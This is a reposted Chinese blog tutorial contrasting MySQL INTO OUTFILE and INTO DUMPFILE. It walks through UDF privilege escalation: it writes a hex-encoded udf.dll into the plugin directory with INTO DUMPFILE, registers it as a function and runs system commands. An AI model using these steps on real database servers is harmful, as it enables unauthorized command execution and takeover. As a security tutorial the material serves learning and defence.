mysql outfile 变量_转mysql dumpfile 与 outfile 函数的区别
一直以為兩個函數(shù)作用是相同的 經過簡單測試發(fā)現(xiàn)還是有些區(qū)別的 如下表admin mysql select * from admin; +-----+-----------+---------+ | uid | name | pass | +----+------------+---------+ | 1 | admin | baidusb | | 2 | root | hacksb | | 3 | manage
一直以為兩個函數(shù)作用是相同的
經過簡單測試發(fā)現(xiàn)還是有些區(qū)別的
如下表admin
mysql> select * from admin;
+-----+-----------+---------+
| uid | name????? | pass??? |
+----+------------+---------+
|? 1 | admin????? | baidusb |
|? 2 | root????????? | hacksb? |
|? 3 | manage??? | nimei??? |
|? 4 | boss???????? | helensb |
|? 5 | guanli?????? | admin?? |
|? 6 | superuser? | G0Ood?? |
+----+------------+---------+
mysql> select * from admin into outfile '/home/seclab/test/test1.txt';
Query OK,1 row affected (0.00 sec)
我是想將這些內容 導出到 一個txt文件,事實上是可以完整導出每行記錄的.
這個很適合導庫
而into dump是不行的 它只能導出 一行數(shù)據(jù)!
若我們想把一個 可執(zhí)行2進制 文件用into outfile函數(shù)導出
事實上 導出后 就會被破壞
因為into outfile 函數(shù) 會 在行末端寫入新行 更致命的 是會轉義 換行符
這樣的話這個2進制可執(zhí)行 文件 就會被破壞
這時候我們用into dumpfile 就能導出 一個完整能執(zhí)行的2進制 文件
into dumpfile 函數(shù)不對任何列或行進行終止,也不執(zhí)行任何轉義處理
如在無web腳本 執(zhí)行 但是有mysql root 執(zhí)行的環(huán)境下 我們就可以 通過
into dump 函數(shù)導入udf.dll進行提權
mysql> show variable like '%plugin%';
+----------------+------------------------------------------+
|Variable_name?? | Value??????????????????????????????????? |
+----------------+------------------------------------------+
| plugin_dir???? |c:\mysql\mysql server 5.1\lib/plugin????? |
+----------------+------------------------------------------+
mysql> select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';
mysql> select * from func; #查看是否有人創(chuàng)建過udf 如果有就可以省略
mysql> create function MyCmd returns string soname ''c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';
mysql> select MyCmd('whoam');
一點小知識點:
如何獲取該udf.dll文件的16進制值(hex)?
我們可以本地搭建mysql環(huán)境 找個可以用的udf.dll文件 執(zhí)行下面操作
mysql> select hex(load_file ('c://temp/xxoo.dll')) into outfile 'c:/windows/temp/xxoo.txt';
如何獲取該udf插件的內置 函數(shù)?
通過C32 等16進制 編輯器 或直接通過記事本 打開 看關鍵字 即可
摘自 http://hi.baidu.com/evilrapper/blog/item/5a36f290c9b54692a877a46a.html
總結
以上是生活随笔為你收集整理的mysql outfile 变量_转mysql dumpfile 与 outfile 函数的区别的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 吃高粱米可以减肥吗
- 下一篇: mysql php状态函数_mysql_